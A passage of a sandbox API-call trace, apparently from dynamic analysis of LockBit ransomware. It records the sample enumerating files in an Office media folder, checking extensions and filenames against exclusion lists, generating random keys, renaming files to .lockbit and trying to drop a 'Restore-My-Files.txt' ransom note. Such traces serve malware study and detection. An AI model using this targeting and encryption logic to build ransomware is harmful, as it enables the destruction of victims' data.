returned 1 [0197.313] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.314] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.314] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bd8800, ftCreationTime.dwHighDateTime=0x1be9cd9, ftLastAccessTime.dwLowDateTime=0xbd5853c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb0bd8800, ftLastWriteTime.dwHighDateTime=0x1be9cd9, nFileSizeHigh=0x0, nFileSizeLow=0x13d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0240695.WMF", cAlternateFileName="")) returned 1 [0197.314] lstrcmpiW (lpString1=".", lpString2="J0240695.WMF") returned -1 [0197.314] lstrcmpiW (lpString1="..", lpString2="J0240695.WMF") returned -1 [0197.314] PathFindExtensionW (pszPath="J0240695.WMF") returned=".WMF" [0197.314] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.314] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.315] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.315] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0240695.WMF") returned 1 [0197.315] lstrcmpiW (lpString1="ntldr", lpString2="J0240695.WMF") returned 1 [0197.316] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0240695.WMF") returned 1 [0197.316] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0240695.WMF") returned -1 [0197.316] lstrcmpiW (lpString1="autorun.inf", lpString2="J0240695.WMF") returned -1 [0197.316] lstrcmpiW (lpString1="thumbs.db", lpString2="J0240695.WMF") returned 1 [0197.316] lstrcmpiW (lpString1="iconcache.db", lpString2="J0240695.WMF") returned -1 [0197.316] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.316] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240695.WMF") returned=".WMF" [0197.316] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.316] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.316] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.317] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.317] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.317] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.317] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.317] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240695.WMF.lockbit") returned 70 [0197.317] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240695.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0240695.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.326] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.327] malloc (_Size=0x40068) returned 0x3df0008 [0197.327] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5078) returned 1 [0197.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.328] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.349] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240695.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240695.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.349] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.349] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.351] free (_Block=0x1fa2ed8) [0197.351] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240695.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.351] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.351] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.351] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc16dfe00, ftCreationTime.dwHighDateTime=0x1be9cd9, ftLastAccessTime.dwLowDateTime=0xbd5ab520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc16dfe00, ftLastWriteTime.dwHighDateTime=0x1be9cd9, nFileSizeHigh=0x0, nFileSizeLow=0x1aa2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0240719.WMF", cAlternateFileName="")) returned 1 [0197.358] lstrcmpiW (lpString1=".", lpString2="J0240719.WMF") returned -1 [0197.358] lstrcmpiW (lpString1="..", lpString2="J0240719.WMF") returned -1 [0197.358] PathFindExtensionW (pszPath="J0240719.WMF") returned=".WMF" [0197.358] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.358] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.359] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.359] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0240719.WMF") returned 1 [0197.360] lstrcmpiW (lpString1="ntldr", lpString2="J0240719.WMF") returned 1 [0197.360] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0240719.WMF") returned 1 [0197.360] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0240719.WMF") returned -1 [0197.360] lstrcmpiW (lpString1="autorun.inf", lpString2="J0240719.WMF") returned -1 [0197.360] lstrcmpiW (lpString1="thumbs.db", lpString2="J0240719.WMF") returned 1 [0197.360] lstrcmpiW (lpString1="iconcache.db", lpString2="J0240719.WMF") returned -1 [0197.360] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.360] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240719.WMF") returned=".WMF" [0197.360] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.360] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.360] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.361] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.361] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240719.WMF.lockbit") returned 70 [0197.361] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240719.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0240719.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.364] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.364] malloc (_Size=0x40068) returned 0x3df0008 [0197.364] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6818) returned 1 [0197.364] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.365] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.375] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240719.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240719.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.375] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.375] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.377] free (_Block=0x1fa2ed8) [0197.377] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0240719.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.377] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.377] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.377] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d89700, ftCreationTime.dwHighDateTime=0x1beb2f4, ftLastAccessTime.dwLowDateTime=0xbd5ab520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x28d89700, ftLastWriteTime.dwHighDateTime=0x1beb2f4, nFileSizeHigh=0x0, nFileSizeLow=0x1498, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0251301.WMF", cAlternateFileName="")) returned 1 [0197.382] lstrcmpiW (lpString1=".", lpString2="J0251301.WMF") returned -1 [0197.382] lstrcmpiW (lpString1="..", lpString2="J0251301.WMF") returned -1 [0197.382] PathFindExtensionW (pszPath="J0251301.WMF") returned=".WMF" [0197.382] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.382] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.382] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.382] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.383] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.384] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.384] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0251301.WMF") returned 1 [0197.385] lstrcmpiW (lpString1="ntldr", lpString2="J0251301.WMF") returned 1 [0197.385] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0251301.WMF") returned 1 [0197.385] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0251301.WMF") returned -1 [0197.385] lstrcmpiW (lpString1="autorun.inf", lpString2="J0251301.WMF") returned -1 [0197.385] lstrcmpiW (lpString1="thumbs.db", lpString2="J0251301.WMF") returned 1 [0197.385] lstrcmpiW (lpString1="iconcache.db", lpString2="J0251301.WMF") returned -1 [0197.385] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.385] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0251301.WMF") returned=".WMF" [0197.385] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.385] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.385] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 